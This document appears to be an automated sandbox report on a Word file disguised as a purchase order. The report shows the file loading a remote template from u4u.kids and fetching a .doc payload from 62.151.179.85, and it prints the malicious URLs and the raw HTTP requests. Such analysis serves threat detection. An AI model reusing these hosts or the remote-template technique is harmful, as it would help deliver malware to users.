Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: PO NAHK22012FA000000.docx	Stream path 'CONTENTS' entropy: 7.98640213683 (max. 8.0)
Source: ~WRD0000.tmp.0.dr	Stream path 'CONTENTS' entropy: 7.98640213683 (max. 8.0)
Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.dr	Stream path '_1791189376/CONTENTS' entropy: 7.98640213683 (max. 8.0)

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
62.151.179.85	unknown	Spain		8560	ONEANDONE-ASBrauerstrasse48DE	false
24.199.88.84	u4u.kids	United States		12271	TWC-12271-NYCUS	true

Contacted Domains

Name	IP	Active
u4u.kids	24.199.88.84	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://u4u.kids/rxbtFA?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament	false		unknown
http://62.151.179.85/202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodpersonwithgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.doc	false		unknown

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49167 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49164 version: TLS 1.2

Potential document exploit detected (performs DNS queries)

Source: global traffic	DNS query: name: u4u.kids
Source: global traffic	DNS query: name: u4u.kids
Source: global traffic	DNS query: name: u4u.kids
Source: global traffic	DNS query: name: u4u.kids
Source: global traffic	DNS query: name: u4u.kids
Source: global traffic	DNS query: name: u4u.kids
Source: global traffic	DNS query: name: u4u.kids

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
Source: global traffic	TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global traffic	TCP traffic: 62.151.179.85:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global traffic	TCP traffic: 62.151.179.85:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 62.151.179.85:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 62.151.179.85:80
Source: global traffic	TCP traffic: 62.151.179.85:80 -> 192.168.2.22:49170

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: TWC-12271-NYCUS TWC-12271-NYCUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /rxbtFA?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: u4u.kidsConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodpersonwithgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.doc HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 62.151.179.85Connection: Keep-Alive

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49167 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 62.151.179.85
Source: unknown	TCP traffic detected without corresponding DNS query: 62.151.179.85
Source: unknown	TCP traffic detected without corresponding DNS query: 62.151.179.85
Source: unknown	TCP traffic detected without corresponding DNS query: 62.151.179.85
Source: unknown	TCP traffic detected without corresponding DNS query: 62.151.179.85

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CE9AD520-4EB5-4337-9147-8A3BC8A776F2}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /rxbtFA?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: u4u.kidsConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodpersonwithgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.doc HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 62.151.179.85Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: u4u.kids

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:50:13 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 15:50:14 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: unknown

HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49164 version: TLS 1.2

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: classification engine

Classification label: mal56.evad.winDOCX@1/16@7/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$ NAHK22012FA000000.docx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR894B.tmp

Jump to behavior

Source: PO NAHK22012FA000000.docx	OLE indicator, Word Document stream: true
Source: PO NAHK22012FA000000.docx	OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.dr	OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.dr	OLE indicator, Word Document stream: true

Source: PO NAHK22012FA000000.docx	OLE document summary: title field not present or empty
Source: PO NAHK22012FA000000.docx	OLE document summary: title field not present or empty
Source: ~WRD0000.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRD0000.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: PO NAHK22012FA000000.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\PO NAHK22012FA000000.docx

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: PO NAHK22012FA000000.docx	Initial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: PO NAHK22012FA000000.docx	Initial sample: OLE zip file path = word/media/image3.emf
Source: PO NAHK22012FA000000.docx	Initial sample: OLE zip file path = word/embeddings/oleObject2.bin
Source: PO NAHK22012FA000000.docx	Initial sample: OLE zip file path = word/media/image2.emf
Source: PO NAHK22012FA000000.docx	Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/embeddings/Microsoft_Excel_Worksheet1.xlsx
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/embeddings/oleObject2.bin
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/media/image2.emf
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/media/image3.emf

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: PO NAHK22012FA000000.docx

Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Microsoft Office launches external ms-search protocol handler (WebDAV)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: \Device\RdpDr\;:1\u4u.kids@SSL\DavWWWRoot

Jump to behavior

Contains an external reference to another file

Source: settings.xml.rels

Extracted files from sample: https://u4u.kids/rxbtfa?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament

Office viewer loads remote template

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Section loaded: netapi32.dll and davhlpr.dll loaded

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
